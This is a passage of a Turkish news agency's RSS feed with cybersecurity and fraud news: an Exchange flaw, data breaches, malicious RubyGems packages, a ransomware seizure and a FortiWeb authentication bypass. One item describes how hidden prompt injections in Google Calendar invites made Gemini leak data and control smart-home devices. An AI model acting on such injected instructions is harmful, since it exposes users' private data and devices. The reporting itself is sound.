<p data-start="415" data-end="676"><strong data-start="415" data-end="449">Dört üst düzey üye iade edildi</strong><br data-start="449" data-end="452">Gana merkezli dolandırıcılık örgütünün yöneticileri olduğu belirtilen Isaac Oduro Boateng (“Kofi Boat”), Inusah Ahmed (“Pascal”), Derrick Van Yeboah (“Van”) ve Patrick Kwame Asare (“Borgar”), 7 Ağustos’ta ABD’ye getirildi.</p>
<p data-start="678" data-end="1007"><strong data-start="678" data-end="732">Yöntem: aşk dolandırıcılığı ve e-posta saldırıları</strong><br data-start="732" data-end="735">Mahkeme belgelerine göre çete, çoğunlukla yalnız yaşayan yaşlı Amerikalıları sahte romantik ilişkilerle kandırdı. Güven kazandıktan sonra mağdurları para göndermeye ikna ettiler. ABD’deki aracılar parayı akladıktan sonra asıl faillerin bulunduğu Batı Afrika’ya gönderdi.</p>
<p data-start="1009" data-end="1265">Çete aynı zamanda şirketleri de hedef aldı. Çalışanların veya müşterilerin e-posta adreslerini taklit eden sahte hesaplarla finans yetkililerini kandırarak milyonlarca dolarlık havaleler yaptırdılar. Sahte imzalı belgelerle transferleri meşrulaştırdılar.</p>
<p data-start="1267" data-end="1525"><strong data-start="1267" data-end="1303">“Chairmen” adıyla yönetilen yapı</strong><br data-start="1303" data-end="1306">Boateng ve Ahmed örgütte “chairman” (başkan) rolünü üstlenirken, Asare ve Van Yeboah da üst düzey konumlarda faaliyet gösterdi. Van Yeboah’ın özellikle aşk dolandırıcılığı operasyonlarında aktif rol aldığı belirlendi.</p>
<p data-start="1527" data-end="1767"><strong data-start="1527" data-end="1552">Ağır cezalar gündemde</strong><br data-start="1552" data-end="1555">Sanıklar; kablolu dolandırıcılık yapmak ve buna teşebbüs (20 yıla kadar), kara para aklama (20 yıl), çalıntı para alma ve buna teşebbüs (5 yıl) ve çalıntı parayı elde tutma (10 yıl) suçlamalarıyla yargılanacak.</p>
<p data-start="1769" data-end="1965"><strong data-start="1769" data-end="1781"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>29 binden fazla Microsoft Exchange sunucusu kritik güvenlik açığına karşı hâlâ yamalanmadı</title>
<link>https://www.ajansexpres.com.tr/29-binden-fazla-microsoft-exchange-sunucusu-kritik-guvenlik-acigina-karsi-hala-yamalanmadi</link>
<guid>https://www.ajansexpres.com.tr/29-binden-fazla-microsoft-exchange-sunucusu-kritik-guvenlik-acigina-karsi-hala-yamalanmadi</guid>
<description><![CDATA[ Shadowserver verilerine göre dünya genelinde 29 binden fazla Exchange sunucusu, Nisan 2025’te duyurulan ve CVE-2025-53786 olarak takip edilen yüksek önem dereceli güvenlik açığına karşı korunmasız durumda. Bu açık, saldırganların hibrit ortamlarda yetki yükselterek bulut sistemlerine yayılmasına ve tüm etki alanının ele geçirilmesine yol açabiliyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cc7b1f23d.webp" length="61418" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:24:10 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>CVE-2025-53786 açığı saldırganlara hangi imkanları veriyor, dünya genelinde kaç Exchange sunucusu etkileniyor, CISA federal kurumlara hangi adımları zorunlu kıldı, Microsoft hangi yamaları öneriyor</media:keywords>
<content:encoded><![CDATA[<p data-start="502" data-end="886"><strong data-start="502" data-end="532">Ciddi risk barındıran açık</strong><br data-start="532" data-end="535">CVE-2025-53786, Exchange Server 2016, 2019 ve Subscription Edition sürümlerini etkiliyor. Açık, saldırganların on-premise Exchange sunucularından aldıkları yönetici erişimini kullanarak Microsoft bulut ortamlarında sahte token ve API çağrılarıyla yetki yükseltmesine imkân tanıyor. Bu süreç, iz bırakmadan gerçekleştirilebildiği için tespiti de zor.</p>
<p data-start="888" data-end="1149"><strong data-start="888" data-end="927">29 binden fazla sunucu yamalanmamış</strong><br data-start="927" data-end="930">Shadowserver’ın 10 Ağustos tarihli taramalarına göre dünya genelinde 29.098 sunucu halen yamalanmamış durumda. Bunların 7.200’den fazlası ABD’de, 6.700’den fazlası Almanya’da, 2.500’den fazlası ise Rusya’da bulunuyor.</p>
<p data-start="1151" data-end="1418"><strong data-start="1151" data-end="1185">Microsoft ve CISA’dan uyarılar</strong><br data-start="1185" data-end="1188">Microsoft, açığı Nisan 2025’te yayımladığı bir güvenlik danışmanlığı ve hotfix ile duyurdu. Şirket, “kötüye kullanılma ihtimali yüksek” olarak işaretlediği açık için tüm hibrit yapıların yeni mimariye geçirilmesini tavsiye etti.</p>
<p data-start="1420" data-end="1683">ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), 25-02 numaralı acil direktifle federal kurumlara 9 Ağustos Pazartesi sabahına kadar yama yapma zorunluluğu getirdi. CISA ayrıca, federal olmayan kurumların da aynı adımları uygulaması gerektiğini vurguladı.</p>
<p data-start="1685" data-end="1716"><strong data-start="1685" data-end="1714">Alınması gereken önlemler</strong></p>
<ul data-start="1717" data-end="1922">
<li data-start="1717" data-end="1772">
<p data-start="1719" data-end="1772">Microsoft Health Checker script ile ortam taraması,</p>
</li>
<li data-start="1773" data-end="1814">
<p data-start="1775" data-end="1814">EOL sürümlerin internetten ayrılması,</p>
</li>
<li data-start="1815" data-end="1882">
<p data-start="1817" data-end="1882">Exchange 2019 için CU14/15, Exchange 2016 için CU23 yüklenmesi,</p>
</li>
<li data-start="1883" data-end="1922">
<p data-start="1885" data-end="1922">Nisan 2025 hotfix’inin uygulanması.</p>
</li>
</ul>
<p data-start="1924" data-end="2117"><strong data-start="1924" data-end="1967">Uyarı: tam etki alanı ele geçirilebilir</strong><br data-start="1967" data-end="1970">CISA, önlemlerin alınmaması halinde hem hibrit bulut hem de on-premise ortamların tamamen ele geçirilme riskiyle karşı karşıya olduğunu açıkladı.</p>
<p data-start="2119" data-end="2335"><strong data-start="2119" data-end="2131"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Connex Credit Union veri ihlali: 172 bin üyenin kişisel ve finansal bilgileri çalındı</title>
<link>https://www.ajansexpres.com.tr/connex-credit-union-veri-ihlali-172-bin-uyenin-kisisel-ve-finansal-bilgileri-calindi</link>
<guid>https://www.ajansexpres.com.tr/connex-credit-union-veri-ihlali-172-bin-uyenin-kisisel-ve-finansal-bilgileri-calindi</guid>
<description><![CDATA[ Connecticut’un en büyük kredi birliklerinden Connex, Haziran 2025’te yaşanan siber saldırıda 172 bin üyesine ait isim, hesap numarası, kart bilgileri, Sosyal Güvenlik numarası ve devlet kimliklerinin sızdırıldığını duyurdu. Fonlara erişim tespit edilmezken, sahte Connex çalışanlarıyla kimlik avı girişimleri başladığı uyarısı yapıldı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cc7650620.webp" length="37746" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:24:06 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Connex Credit Union saldırısında kaç kişi etkilendi, hangi bilgiler sızdırıldı, fonlara erişim sağlandı mı, üyeler hangi dolandırıcılık riskleriyle karşı karşıya</media:keywords>
<content:encoded><![CDATA[<p data-start="481" data-end="724"><strong data-start="481" data-end="512">İhlal bir günde fark edildi</strong><br data-start="512" data-end="515">Connex, 2 Haziran 2025’te sistemlerine yetkisiz erişim sağlandığını, ihlalin 3 Haziran’da tespit edildiğini açıkladı. Yapılan incelemelerde bazı dosyaların izinsiz görüntülendiği veya indirildiği belirlendi.</p>
<p data-start="726" data-end="1080"><strong data-start="726" data-end="752">172 bin kişi etkilendi</strong><br data-start="752" data-end="755">27 Temmuz’da tamamlanan incelemede, toplam 172 bin üyenin verilerinin risk altında olduğu tespit edildi. Çalınan bilgiler arasında isimler, hesap numaraları, banka kartı verileri, Sosyal Güvenlik numaraları ve devlet kimlikleri bulunuyor. Şirket, üyelerin hesap bakiyelerine erişildiğine dair bir bulgu olmadığını bildirdi.</p>
<p data-start="1082" data-end="1395"><strong data-start="1082" data-end="1112">Dolandırıcılık riski arttı</strong><br data-start="1112" data-end="1115">Connex, resmi internet sitesine koyduğu uyarıyla üyeleri devam eden oltalama saldırılarına karşı bilgilendirdi. Açıklamada, “Connex hiçbir zaman sizden PIN, şifre veya hesap numarası istemez. Şüpheli bir arama veya mesaj alırsanız telefonu kapatıp doğrudan bizi arayın” denildi.</p>
<p data-start="1397" data-end="1725"><strong data-start="1397" data-end="1439">Geniş çaplı saldırı dalgasının parçası</strong><br data-start="1439" data-end="1442">İhlalin, Salesforce platformlarını hedef alan ShinyHunters grubuyla ilişkilendirilen saldırı dalgasının ardından gelmesi dikkat çekti. Son aylarda Allianz Life, Adidas, Qantas, Louis Vuitton, Dior, Tiffany & Co., Chanel ve Google gibi markalar da benzer saldırılardan etkilenmişti.</p>
<p data-start="1727" data-end="1907"><strong data-start="1727" data-end="1739"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Google Calendar davetleriyle Gemini asistanı ele geçirilebilen açık kapatıldı</title>
<link>https://www.ajansexpres.com.tr/google-calendar-davetleriyle-gemini-asistani-ele-gecirilebilen-acik-kapatildi</link>
<guid>https://www.ajansexpres.com.tr/google-calendar-davetleriyle-gemini-asistani-ele-gecirilebilen-acik-kapatildi</guid>
<description><![CDATA[ SafeBreach araştırmacıları, kötü niyetli takvim davetleriyle Google’ın Gemini asistanının uzaktan manipüle edilerek e-posta, takvim, konum ve akıllı ev cihazı verilerinin sızdırılabileceğini gösterdi. Açık, kullanıcı etkileşimi gerektirmeden yalnızca rutin komutlarla tetiklenebiliyordu. Google, bildirilen güvenlik açığını hızla yamaladığını duyurdu. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cc6dd6a1b.webp" length="37770" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:23:57 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Google Calendar davetleriyle Gemini nasıl ele geçirilebiliyordu, saldırganlar hangi verileri sızdırabiliyordu, açığın istismar edilmesi için kaç davet gerekiyordu, Google açığı nasıl kapattı</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="489" data-end="900"><strong data-start="489" data-end="534">Kritik açık Calendar üzerinden tetiklendi</strong><br data-start="534" data-end="537">Gemini, Gmail, Calendar ve Google Home gibi hizmetlere entegre çalışıyor. Açık, saldırganın Google Calendar davetinde etkinlik başlığına zararlı bir “prompt injection” gizlemesiyle tetikleniyordu. Kullanıcı Gemini’ye “Bugün takvimimde ne var” gibi rutin bir soru yönelttiğinde, asistan ilgili başlıkları okuyor ve zararlı komutu da kendi bağlamında yürütüyordu.</p>
<p data-start="902" data-end="961"><strong data-start="902" data-end="931">Olası saldırı senaryoları</strong><br data-start="931" data-end="934">Bu yöntemle saldırganlar:</p>
<ul data-start="962" data-end="1207">
<li data-start="962" data-end="1029">
<p data-start="964" data-end="1029">Kullanıcının e-posta ve takvim verilerini dışarı aktarabiliyor,</p>
</li>
<li data-start="1030" data-end="1083">
<p data-start="1032" data-end="1083">Akıllı ev cihazlarını uzaktan kontrol edebiliyor,</p>
</li>
<li data-start="1084" data-end="1143">
<p data-start="1086" data-end="1143">Uygulama açabiliyor veya Zoom görüşmesi başlatabiliyor,</p>
</li>
<li data-start="1144" data-end="1207">
<p data-start="1146" data-end="1207">Kullanıcının IP adresini öğrenmek için URL açtırabiliyordu.</p>
</li>
</ul>
<p data-start="1209" data-end="1554"><strong data-start="1209" data-end="1239">Altı davetlik sinsi yöntem</strong><br data-start="1239" data-end="1242">Araştırmacılar, Calendar’da yalnızca son beş etkinliğin doğrudan görüntülendiğini belirledi. Bu nedenle saldırganların görünürlükten kaçınmak için altı davet göndermesi, zararlı prompt’u sonuncuya gizlemesi gerekiyordu. Kullanıcılar bu daveti yalnızca “Daha fazla göster” seçeneğine tıklarsa fark edebiliyordu.</p>
<p data-start="1556" data-end="1867"><strong data-start="1556" data-end="1580">Google açığı kapattı</strong><br data-start="1580" data-end="1583">Google, SafeBreach araştırmacıları Ben Nassi ve ekibinin sorumlu bildirim süreci sayesinde açığın istismar edilmeden kapatıldığını açıkladı. Google Workspace güvenlik ürün yönetimi direktörü Andy Wen, araştırmanın savunma mekanizmalarının geliştirilmesini hızlandırdığını vurguladı.</p>
<p data-start="1869" data-end="2172"><strong data-start="1869" data-end="1905">Daha önce de uyarılar yapılmıştı</strong><br data-start="1905" data-end="1908">Geçen ay Mozilla araştırmacısı Marco Figueroa, Gemini’nin başka bir “prompt injection” tekniğine karşı savunmasız olduğunu ve bunun kimlik avı saldırılarına kapı aralayabileceğini açıklamıştı. Google, yeni koruma önlemlerinin devreye alınmakta olduğunu belirtti.</p>
<p data-start="2174" data-end="2383"><strong data-start="2174" data-end="2186"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Google, Salesforce ihlalinde potansiyel Google Ads müşterilerinin bilgilerinin açığa çıktığını doğruladı</title>
<link>https://www.ajansexpres.com.tr/google-salesforce-ihlalinde-potansiyel-google-ads-musterilerinin-bilgilerinin-aciga-ciktigini-dogruladi</link>
<guid>https://www.ajansexpres.com.tr/google-salesforce-ihlalinde-potansiyel-google-ads-musterilerinin-bilgilerinin-aciga-ciktigini-dogruladi</guid>
<description><![CDATA[ Google, bir Salesforce CRM örneğine yapılan saldırı sonucu potansiyel Google Ads müşterilerine ait 2,5 milyondan fazla kaydın tehdit aktörleri tarafından ele geçirildiğini açıkladı. Sızdırılan bilgiler arasında şirket adları, telefon numaraları ve satış temsilcisi notları bulunuyor. Google, ödeme verilerinin etkilenmediğini duyurdu. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cc6768a7c.webp" length="27720" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:23:51 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Google Ads müşterilerine ait hangi veriler sızdırıldı, saldırıyı hangi gruplar üstlendi, ShinyHunters fidye talebinde bulundu mu, saldırganlar Salesforce verilerini nasıl ele geçiriyor</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="499" data-end="912"><strong data-start="499" data-end="540">İhlal potansiyel müşterileri etkiledi</strong><br data-start="540" data-end="543">Google’ın yaptığı bildirimde, Salesforce üzerinden potansiyel Ads müşterileriyle iletişimde kullanılan verilerin yetkisiz kişilerce erişildiği belirtildi. Etkilenen veriler arasında şirket adları, telefon numaraları ve satış temsilcilerinin notları yer aldı. Ads hesapları, Merchant Center, Analytics ve diğer ürünlerdeki müşteri verilerinin etkilenmediği vurgulandı.</p>
<p data-start="914" data-end="1212"><strong data-start="914" data-end="951">ShinyHunters saldırının arkasında</strong><br data-start="951" data-end="954">Saldırının, son aylarda Salesforce müşterilerini hedef alan ShinyHunters grubuyla bağlantılı olduğu doğrulandı. Grup, ele geçirilen verilerin yaklaşık 2,55 milyon kayıttan oluştuğunu iddia etti. Kayıtların arasında mükerrer girişler olabileceği belirtildi.</p>
<p data-start="1214" data-end="1609"><strong data-start="1214" data-end="1249">Scattered Spider ile iş birliği</strong><br data-start="1249" data-end="1252">ShinyHunters, saldırılarda ilk erişimi sağlayan Scattered Spider ile ortak hareket ettiklerini ve birlikte “Sp1d3rHunters” adı altında çalıştıklarını açıkladı. Grup, çalışanlara yönelik sosyal mühendislik saldırılarıyla kimlik bilgisi elde edip, Salesforce ortamlarına kötü amaçlı OAuth uygulamaları bağlatarak tüm veritabanlarını indirdiklerini bildirdi.</p>
<p data-start="1611" data-end="1929"><strong data-start="1611" data-end="1643">Fidye talebi ve yeni araçlar</strong><br data-start="1643" data-end="1646">ShinyHunters, Google’dan 20 Bitcoin (yaklaşık 2,3 milyon dolar) talep ettiklerini, ancak bu talebi “ciddi olmayan” bir hamle olarak nitelendirdiklerini söyledi. Grup ayrıca, artık Salesforce Data Loader yerine kendi geliştirdikleri Python tabanlı araçları kullandıklarını açıkladı.</p>
<p data-start="1931" data-end="2183"><strong data-start="1931" data-end="1954">Google’dan açıklama</strong><br data-start="1954" data-end="1957">Google, Haziran 2025’te bu saldırı yöntemlerine dikkat çekmişti. Şirket, saldırıyı doğrularken kullanıcıların Ads hesaplarının güvende olduğunu yineledi. Ayrıca, yeni araçlarla yapılan saldırıları gözlemlediklerini belirtti.</p>
<p data-start="2185" data-end="2388"><strong data-start="2185" data-end="2197"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>275 bin kez indirilen 60 sahte Ruby kütüphanesi, kullanıcıların hesap bilgilerini çaldı</title>
<link>https://www.ajansexpres.com.tr/275-bin-kez-indirilen-60-sahte-ruby-kutuphanesi-kullanicilarin-hesap-bilgilerini-caldi</link>
<guid>https://www.ajansexpres.com.tr/275-bin-kez-indirilen-60-sahte-ruby-kutuphanesi-kullanicilarin-hesap-bilgilerini-caldi</guid>
<description><![CDATA[ Socket’in raporuna göre, Mart 2023’ten bu yana RubyGems üzerinde yayımlanan 60 zararlı “gem” paketi 275 binden fazla kez indirildi. Instagram, TikTok, Telegram, Naver, WordPress ve Kakao gibi platformlara otomasyon aracı gibi görünen bu kütüphaneler aslında kullanıcı adı, şifre ve cihaz bilgilerini saldırganların sunucularına gönderiyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cc5c459de.webp" length="36444" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:23:40 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Zararlı Ruby kütüphaneleri hangi platform kullanıcılarını hedef aldı, hangi bilgileri çaldı, veriler nerede satışa çıkarıldı, geliştiriciler kendilerini nasıl koruyabilir</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="487" data-end="860"><strong data-start="487" data-end="526">Sahte otomasyon araçlarıyla yayılım</strong><br data-start="526" data-end="529">Ruby programlama dilinin resmi paket yöneticisi RubyGems.org üzerinde, farklı takma adlar kullanan saldırganlar tarafından yayımlanan zararlı kütüphaneler, özellikle Güney Koreli kullanıcıları hedef aldı. Paketler, WordPress, Telegram, Naver Café, SEO araçları ve blog platformlarına yönelik otomasyon yazılımları gibi tanıtıldı.</p>
<p data-start="862" data-end="1213"><strong data-start="862" data-end="891">Gerçekte kimlik avı aracı</strong><br data-start="891" data-end="894">Kütüphaneler kurulduğunda meşru görünümlü bir arayüz sunuyor, ancak kullanıcı giriş bilgilerini doğrudan saldırganların kontrolündeki alan adlarına (programzon[.]com, appspace[.]kr, marketingduo[.]co[.]kr) iletiyordu. Çalınan veriler arasında kullanıcı adı, şifre (düz metin), cihaz MAC adresi ve paket adı bulunuyor.</p>
<p data-start="1215" data-end="1476"><strong data-start="1215" data-end="1245">Karanlık ağda satışa çıktı</strong><br data-start="1245" data-end="1248">Araştırmacılar, elde edilen bilgilerin Rusça konuşulan dark web pazarlarında satışa çıkarıldığını tespit etti. Kimlik bilgisi günlüklerinin saldırganların kontrol ettiği marketingduo[.]co[.]kr ile bağlantılı olduğu belirlendi.</p>
<p data-start="1478" data-end="1749"><strong data-start="1478" data-end="1503">16 paket hâlâ yayında</strong><br data-start="1503" data-end="1506">Socket, tüm zararlı paketleri RubyGems ekibine bildirdiğini, ancak en az 16’sının hâlâ indirilebilir olduğunu açıkladı. Bu durum, açık kaynak yazılım depolarına yönelik tedarik zinciri saldırılarının süregelen bir tehdit olduğunu gösteriyor.</p>
<p data-start="1751" data-end="2049"><strong data-start="1751" data-end="1776">Geliştiricilere uyarı</strong><br data-start="1776" data-end="1779">Uzmanlar, kütüphaneleri indirirken yayıncının geçmişini ve paketlerin şüpheli kod içerip içermediğini kontrol etmeyi, bağımlılıkları güvenli sürümlere kilitlemeyi ve obfuscation (gizlenmiş) kod parçaları içeren paketlere karşı dikkatli olunması gerektiğini vurguluyor.</p>
<p data-start="2051" data-end="2240"><strong data-start="2051" data-end="2063"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>ABD, Zeppelin fidye yazılımı operatöründen 2,8 milyon dolarlık kripto para ele geçirdi</title>
<link>https://www.ajansexpres.com.tr/abd-zeppelin-fidye-yazilimi-operatoerunden-28-milyon-dolarlik-kripto-para-ele-gecirdi</link>
<guid>https://www.ajansexpres.com.tr/abd-zeppelin-fidye-yazilimi-operatoerunden-28-milyon-dolarlik-kripto-para-ele-gecirdi</guid>
<description><![CDATA[ ABD Adalet Bakanlığı, 2019–2022 yılları arasında faaliyet gösteren Zeppelin fidye yazılımıyla bağlantılı olduğu belirtilen Ianis Aleksandrovich Antropenko’dan 2,8 milyon dolar değerinde kripto para, 70 bin dolar nakit ve lüks bir araç ele geçirildiğini duyurdu. Antropenko, bilgisayar dolandırıcılığı ve kara para aklama suçlamalarıyla Teksas’ta iddianameyle karşı karşıya. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cc558284a.webp" length="41570" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:23:33 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Zeppelin fidye yazılımı kimleri hedef aldı, Ianis Antropenko hangi suçlamalarla karşı karşıya, fidye ödemeleri nasıl aklanmaya çalışıldı, ABD daha önce hangi fidye gruplarından kripto paralara el koydu</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="520" data-end="865"><strong data-start="520" data-end="557">Ransomware gelirleri takip edildi</strong><br data-start="557" data-end="560">Antropenko’nun, Zeppelin fidye yazılımı saldırılarıyla elde ettiği fidye ödemelerini aklamak için ChipMixer gibi kripto para karıştırma hizmetlerini, nakit dönüşüm işlemlerini ve parçalara bölünmüş banka yatırımlarını kullandığı tespit edildi. ChipMixer, Mart 2023’te yetkililer tarafından kapatılmıştı.</p>
<p data-start="867" data-end="1153"><strong data-start="867" data-end="890">Zeppelin’in geçmişi</strong><br data-start="890" data-end="893">2019 sonunda VegaLocker/Buran fidye yazılımının bir türevi olarak ortaya çıkan Zeppelin, özellikle sağlık ve bilişim firmalarını hedef aldı. 2021’de güncellenmiş sürümlerle yeniden ortaya çıksa da kullanılan şifreleme yöntemlerinin zayıflığı dikkat çekmişti.</p>
<p data-start="1155" data-end="1426">Kasım 2022’de operasyon büyük ölçüde sona erdi. Daha sonra güvenlik araştırmacılarının 2020’den bu yana ücretsiz dosya kurtarma anahtarına sahip olduğu ortaya çıktı. Ocak 2024’te ise Zeppelin kaynak kodunun bir hacker forumunda yalnızca 500 dolara satıldığı bildirildi.</p>
<p data-start="1428" data-end="1692"><strong data-start="1428" data-end="1460">Fidye ödemelerine el konuldu</strong><br data-start="1460" data-end="1463">Ele geçirilen 2,8 milyon doların fidye gelirlerinden kaynaklandığı belirtiliyor. ABD yetkilileri geçtiğimiz haftalarda da BlackSuit grubundan 1 milyon dolar, Chaos grubundan ise 2,4 milyon dolar değerinde Bitcoin’e el koymuştu.</p>
<p data-start="1694" data-end="1951"><strong data-start="1694" data-end="1724">Uzmanlara göre kritik adım</strong><br data-start="1724" data-end="1727">Yetkililer, bu tür el koyma operasyonlarının, siber suçluların yakalanamadığı durumlarda bile fidye gelirlerini kullanarak yeniden yapılanmalarını veya yeni üyeler kazanmalarını engellemede kritik rol oynadığını vurguladı.</p>
<p data-start="1953" data-end="2173"><strong data-start="1953" data-end="1965"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>FortiWeb güvenlik açığı “FortMajeure” ile tam kimlik doğrulama atlatması mümkün, araştırmacı PoC yayımladı</title>
<link>https://www.ajansexpres.com.tr/fortiweb-guvenlik-acigi-fortmajeure-ile-tam-kimlik-dogrulama-atlatmasi-mumkun-arastirmaci-poc-yayimladi</link>
<guid>https://www.ajansexpres.com.tr/fortiweb-guvenlik-acigi-fortmajeure-ile-tam-kimlik-dogrulama-atlatmasi-mumkun-arastirmaci-poc-yayimladi</guid>
<description><![CDATA[ CVE-2025-52970 olarak takip edilen kritik FortiWeb zafiyeti, saldırganların sahte oturum çerezleri oluşturarak yönetici dahil herhangi bir kullanıcıyı taklit etmesine izin veriyor. Açık 12 Ağustos’ta yayımlanan yamalarla kapatıldı. Araştırmacı, şimdilik yalnızca kısmi bir PoC paylaştı ve sistem yöneticilerine güncelleme için zaman tanıyacağını açıkladı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cc47a8833.webp" length="30372" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:23:19 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>FortiWeb’deki CVE-2025-52970 açığı nasıl çalışıyor, hangi sürümler etkileniyor, saldırganlar kimlik doğrulamayı nasıl atlatabiliyor, Fortinet kullanıcılarına hangi çözümü öneriyor</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="522" data-end="890"><strong data-start="522" data-end="549">Açığın teknik detayları</strong><br data-start="549" data-end="552">Araştırmacı Aviv Y’nin “FortMajeure” adını verdiği açık, FortiWeb’in çerez ayrıştırma sürecindeki “Era” parametresinden kaynaklanıyor. Bu parametre beklenmedik bir değer aldığında, sunucu tüm sıfırlardan oluşan gizli anahtar kullanıyor. Sonuç olarak, sahte çerezler kolayca oluşturulabiliyor ve kimlik doğrulama tamamen atlatılabiliyor.</p>
<p data-start="892" data-end="1197"><strong data-start="892" data-end="919">Nasıl istismar ediliyor</strong><br data-start="919" data-end="922">CVE-2025-52970’nin sömürülmesi için hedef kullanıcının aktif oturumunun bulunması gerekiyor. Saldırgan, çerezdeki küçük bir sayısal alanı tahmin etmek zorunda, ancak bu değer genellikle 30’un altında olduğundan brute force işlemi yalnızca birkaç denemeyle tamamlanabiliyor.</p>
<p data-start="1199" data-end="1351"><strong data-start="1199" data-end="1232">Etkilenen sürümler ve yamalar</strong><br data-start="1232" data-end="1235">Zafiyet FortiWeb 7.0–7.6 arasındaki sürümleri etkiliyor. Fortinet, aşağıdaki sürümlerde açığı kapattığını duyurdu:</p>
<ul data-start="1353" data-end="1438">
<li data-start="1353" data-end="1373">
<p data-start="1355" data-end="1373">7.6.4 ve sonrası</p>
</li>
<li data-start="1374" data-end="1394">
<p data-start="1376" data-end="1394">7.4.8 ve sonrası</p>
</li>
<li data-start="1395" data-end="1416">
<p data-start="1397" data-end="1416">7.2.11 ve sonrası</p>
</li>
<li data-start="1417" data-end="1438">
<p data-start="1419" data-end="1438">7.0.11 ve sonrası</p>
</li>
</ul>
<p data-start="1440" data-end="1492">FortiWeb 8.0 sürümlerinin etkilenmediği açıklandı.</p>
<p data-start="1494" data-end="1778"><strong data-start="1494" data-end="1522">Araştırmacının yaklaşımı</strong><br data-start="1522" data-end="1525">Aviv Y, REST uç noktası üzerinden admin taklidi gösteren bir PoC çıktısı paylaştı, ancak CLI’ye bağlanmayı da içeren tam istismar kodunu daha sonra yayımlayacağını belirtti. Amaç, saldırganlardan önce savunuculara sistemlerini yamalama süresi tanımak.</p>
<p data-start="1780" data-end="1963"><strong data-start="1780" data-end="1806">Yama dışında çözüm yok</strong><br data-start="1806" data-end="1809">Fortinet’in güvenlik bülteninde herhangi bir geçici çözüm sunulmadı. Bu nedenle güvenli sürümlere güncelleme yapmak tek etkili adım olarak gösteriliyor.</p>
<p data-start="1965" data-end="2163"><strong data-start="1965" data-end="1977"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Microsoft Teams, zararlı URL’ler ve tehlikeli dosya türlerine karşı yeni güvenlik önlemleri getiriyor</title>
<link>https://www.ajansexpres.com.tr/microsoft-teams-zararli-urller-ve-tehlikeli-dosya-turlerine-karsi-yeni-guvenlik-oenlemleri-getiriyor</link>
<guid>https://www.ajansexpres.com.tr/microsoft-teams-zararli-urller-ve-tehlikeli-dosya-turlerine-karsi-yeni-guvenlik-oenlemleri-getiriyor</guid>
<description><![CDATA[ Microsoft, Teams sohbet ve kanallarında kötü amaçlı URL’leri tespit edip kullanıcıları uyaran ve çalıştırılabilir dosyalar gibi tehlikeli dosya türlerini engelleyen yeni güvenlik özelliklerini duyurdu. Özelliklerin Eylül 2025’e kadar tüm dünyada kademeli olarak kullanıma sunulması bekleniyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cc405aff1.webp" length="30934" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:23:12 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Microsoft Teams hangi yeni güvenlik özelliklerini getiriyor, zararlı dosya ve bağlantılar nasıl engellenecek, güvenlik yöneticileri engellenmiş alan adlarını nasıl kontrol edebilecek, Microsoft’un daha önce Teams için getirdiği güvenlik yenilikleri neler</media:keywords>
<content:encoded><![CDATA[<p></p>
